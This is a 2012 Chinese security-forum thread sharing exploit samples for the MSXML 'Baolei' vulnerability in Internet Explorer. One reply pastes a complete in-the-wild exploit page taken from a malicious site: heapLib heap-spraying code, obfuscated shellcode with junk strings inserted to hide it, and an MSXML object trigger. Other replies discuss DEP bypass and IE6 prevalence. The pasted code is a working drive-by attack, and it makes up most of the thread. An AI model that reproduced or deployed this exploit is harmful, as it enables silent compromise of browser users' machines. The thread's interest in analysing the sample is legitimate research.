首页
社区
课程
招聘
[转帖]关于“暴雷”漏洞 利用样本
发表于: 2012-6-30 18:12 7425

[转帖]关于“暴雷”漏洞 利用样本

2012-6-30 18:12
7425
RB
                    不懂网络 希望科普
               msxml_get_definition_code_exec.rar

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 0
支持
分享
最新回复 (7)
雪    币: 206
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
这个样本比较早了,不过dep .只对ie6,7有用.metasploit上有新的样本,据说对ie8管用,能过dep。现在对ie开内存写数据并执行的,似乎也就JIT spray好用些。
2012-7-1 16:59
0
雪    币: 589
活跃值: (119)
能力值: ( LV11,RANK:190 )
在线值:
发帖
回帖
粉丝
3
今天毒网上抓了一个
<html> 
<head> 
<script> 
function heapLib() {
}
heapLib.ie = function(maxAlloc, heapBase) {
    this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
    this.heapBase = (heapBase ? heapBase : 0x150000);
    this.paddingStr = "AAAA";
    while (4 + this.paddingStr.length*2 + 2 < this.maxAlloc) {
        this.paddingStr += this.paddingStr;
    }
    this.mem = new Array();
    this.flushOleaut32();
}

heapLib.ie.prototype.debug = function(msg) {
    void(Math.atan2(0xbabe, msg));
}

heapLib.ie.prototype.debugHeap = function(enable) {
    if (enable == true)
        void(Math.atan(0xbabe));
    else
        void(Math.asin(0xbabe));
}

heapLib.ie.prototype.debugBreak = function(msg) {
    void(Math.acos(0xbabe));
}

heapLib.ie.prototype.padding = function(len) {
    if (len > this.paddingStr.length)
        throw "Requested padding string length " + len + ", only " + this.paddingStr.length + " available";
    return this.paddingStr.substr(0, len);
}

heapLib.ie.prototype.round = function(num, round) {
    if (round == 0)
        throw "Round argument cannot be 0";
    return parseInt((num + (round-1)) / round) * round;
}

heapLib.ie.prototype.hex = function(num, width)
{
    var digits = "0123456789ABCDEF";
    var hex = digits.substr(num & 0xF, 1);
    while (num > 0xF) {
        num = num >>> 4;
        hex = digits.substr(num & 0xF, 1) + hex;
    }
    var width = (width ? width : 0);
    while (hex.length < width)
        hex = "0" + hex;
    return hex;
}

heapLib.ie.prototype.addr = function(addr) {
    return unescape("%u" + this.hex(addr & 0xFFFF, 4) + "%u" + this.hex((addr >> 16) & 0xFFFF, 4));
}

heapLib.ie.prototype.allocOleaut32 = function(arg, tag) {
    var size;
    if (typeof arg == "string" || arg instanceof String)
        size = 4 + arg.length*2 + 2;
    else
        size = arg;
    if ((size & 0xf) != 0)
        throw "Allocation size " + size + " must be a multiple of 16";
    if (this.mem[tag] === undefined)
        this.mem[tag] = new Array();
    if (typeof arg == "string" || arg instanceof String) {
        this.mem[tag].push(arg.substr(0, arg.length));
    }
    else {
        this.mem[tag].push(this.padding((arg-6)/2));
    }
}

heapLib.ie.prototype.freeOleaut32 = function(tag) {
    delete this.mem[tag];
    CollectGarbage();
}

heapLib.ie.prototype.flushOleaut32 = function() {
    this.debug("Flushing the OLEAUT32 cache");
    this.freeOleaut32("oleaut32");
    for (var i = 0; i < 6; i++) {
        this.allocOleaut32(32, "oleaut32");
        this.allocOleaut32(64, "oleaut32");
        this.allocOleaut32(256, "oleaut32");
        this.allocOleaut32(32768, "oleaut32");
    }
}
heapLib.ie.prototype.alloc = function(arg, tag) {
    var size;
    if (typeof arg == "string" || arg instanceof String)
        size = 4 + arg.length*2 + 2;
    else
        size = arg;
    if (size == 32 || size == 64 || size == 256 || size == 32768)
        throw "Allocation sizes " + size + " cannot be flushed out of the OLEAUT32 cache";
    this.allocOleaut32(arg, tag);
}
heapLib.ie.prototype.free = function(tag) {
    this.freeOleaut32(tag);
    this.flushOleaut32();
}

heapLib.ie.prototype.gc = function() {
    this.debug("Running the garbage collector");
    CollectGarbage();
    this.flushOleaut32();
}

heapLib.ie.prototype.freeList = function(arg, count) {
    var count = (count ? count : 1);
    for (var i = 0; i < count; i++) {
        this.alloc(arg);
        this.alloc(arg, "freeList");
    }
    this.alloc(arg);
    this.free("freeList");
}

heapLib.ie.prototype.lookaside = function(arg, count) {
    var size;
    if (typeof arg == "string" || arg instanceof String)
        size = 4 + arg.length*2 + 2;
    else
        size = arg;
    if ((size & 0xf) != 0)
        throw "Allocation size " + size + " must be a multiple of 16";
    if (size+8 >= 1024)
        throw("Maximum lookaside block size is 1008 bytes");
    var count = (count ? count : 1);
    for (var i = 0; i < count; i++)
        this.alloc(arg, "lookaside");
    this.free("lookaside");
}

heapLib.ie.prototype.lookasideAddr = function(arg)
{
    var size;
    if (typeof arg == "string" || arg instanceof String)
        size = 4 + arg.length*2 + 2;
    else
        size = arg;
    if ((size & 0xf) != 0)
        throw "Allocation size " + size + " must be a multiple of 16";
    if (size+8 >= 1024)

        throw("Maximum lookaside block size is 1008 bytes");
    return this.heapBase + 0x688 + ((size+8)/8)*48;
}

heapLib.ie.prototype.vtable = function(shellcode, jmpecx, size) {
    var size = (size ? size : 1008);
    if ((size & 0xf) != 0)
        throw "Vtable size " + size + " must be a multiple of 16";
    if (shellcode.length*2 > size-138)
        throw("Maximum shellcode length is " + (size-138) + " bytes");
    var vtable = unescape("%u9090%u7ceb")
    for (var i = 0; i < 124/4; i++)
        vtable += this.addr(jmpecx);
    vtable += unescape("%u0028%u0028") + shellcode + heap.padding((size-138)/2 - shellcode.length);
    return vtable;
}

var heap_obj = new heapLib.ie(0x20000);
var scytxtv = "%ud5db%uc9c9%u87cd%u9292%u8f8f%u938f%u8e8a%u8c93%u8f85%u8f93%u8d88%ud992%ucad2%u92d3%ud1c4%ud893%ud8c5%ubdbd%ubdbd";
var scwapx = "%ckwmuBckwmDBckwmD%uBDBckwmD%uBDBckwmD%uBDBD%uBDBckwmD%uBckwmDBD%uBDBckwmD%uBDBckwmD%uEAEA";
var scwapx88 = (scwapx.replace(/ckwm/g,""));
var scwapx99 = "%u54FF%uBEA3%uBDckwmBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uckwmBDBC%u36BD%uD7ckwm55%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDckwmD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44%uBEB9%ufaE1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDckwmBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD%uD7BD%uD7ckwmB9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBckwmDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7ckwmBD%uD7BD%uD7BD%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u42DD%u8DEB%uCBckwm42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636%u7D8E%u66ckwm8E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u34Bckwm5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED%uEDEE%uEDckwmED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDckwmB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADckwmFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u55ckwm85%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1Bckwm55%uBDBD%u7EBD%u1D55%uBDckwmBD%u0ckwm5BD%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u5ckwm13C%uBCBD%uBDBD%u4136%u7A3E%u7AB9%u8FBA%u2CckwmC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2AckwmD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD5ckwm36%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8ckwmED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%uBDBD%u445F%u428E%u42ckwmEA%uB9ckwmEB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405%ckwmuBCE2%u7ADB%uB8FA%u5D42%uEE7E%u61ckwm36%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC93ckwm6%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%ckwmuBE10%u8E78%uB266%uAD03%u6Bckwm87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u36ckwm60%u3ckwm6B9%u78ckwmBE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uckwmD919%u2E5ckwm2%u59ckwm8F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uBckwm0DB%uFE42%u1103%uC066%u18ckwm4D%uEF27%u1A43%u8367%u0BckwmA0%u0584%u69ckwmD4%u03A6%uckwmDBC2%u411D%u8A14%u25ckwm10%uckwmAckwmDB7%ckwmu3D45%u12ckwm6B%u4627%uA8EE";
var scwapx98 = (scwapx99.replace(/ckwm/g,""));
var scwapx123 = "%u58ckwmayt58%u58ckwmayt58%u10ckwmaytEB%u4Bckwmayt5B%uC9ckwmayt33%uB9ckwmayt66%u03ckwmaytB8%u34ckwmayt80%uBDckwmayt0B%uFAE2%u05ckwmaytEB%uEBckwmaytE8%uFFckwmaytFF";
var scwapx1 = (scwapx123.replace(/ckwmayt/g,""));
var woxinxuelaichao = "MXMZ0c0"+"cMXMZ0c0"+"c";
var code = unescape(scwapx1+scwapx98+scytxtv+scwapx88);
var nops = unescape(woxinxuelaichao.replace(/MXMZ/g,'%u'));
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, 0x100);
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var z=1; z < 0x230; z++) {
	heap_obj.alloc(block);
}
</script>
</head>
<body>
<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="vwtI"></object>
<script>
var obj = document.getElementById('vwtI').object;
var src = unescape("%u0c08%u0c0c");
while (src.length < 0x1002) src += src;
src = "\\\\xxx" + src;
src = src.substr(0, 0x1000 - 10);
var pic = document.createElement("img");
pic.src = src;
pic.nameProp;
obj.definition(795);
</script>
</body>
</html>
2012-7-3 01:51
0
雪    币: 219
活跃值: (783)
能力值: (RANK:290 )
在线值:
发帖
回帖
粉丝
4
问一下 楼上的大哥  你是做什么工作的
2012-7-3 14:04
0
雪    币: 95
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
国内网站被挂的暴雷漏洞利用代码 基本上都是针对IE6的 都没用ROP 所以 IE7 8 都没啥事
只能怪国内黑客太不争气
2012-7-3 22:51
0
雪    币: 589
活跃值: (119)
能力值: ( LV11,RANK:190 )
在线值:
发帖
回帖
粉丝
6
国内IE6占有率仍然居高不下
2012-7-6 10:52
0
雪    币: 589
活跃值: (119)
能力值: ( LV11,RANK:190 )
在线值:
发帖
回帖
粉丝
7
无业人士
2012-7-6 10:54
0
雪    币: 24
活跃值: (16)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
IE7 的DEP 貌似也不开的吧.....????
2013-1-3 14:47
0
游客
登录 | 注册 方可回帖
返回
//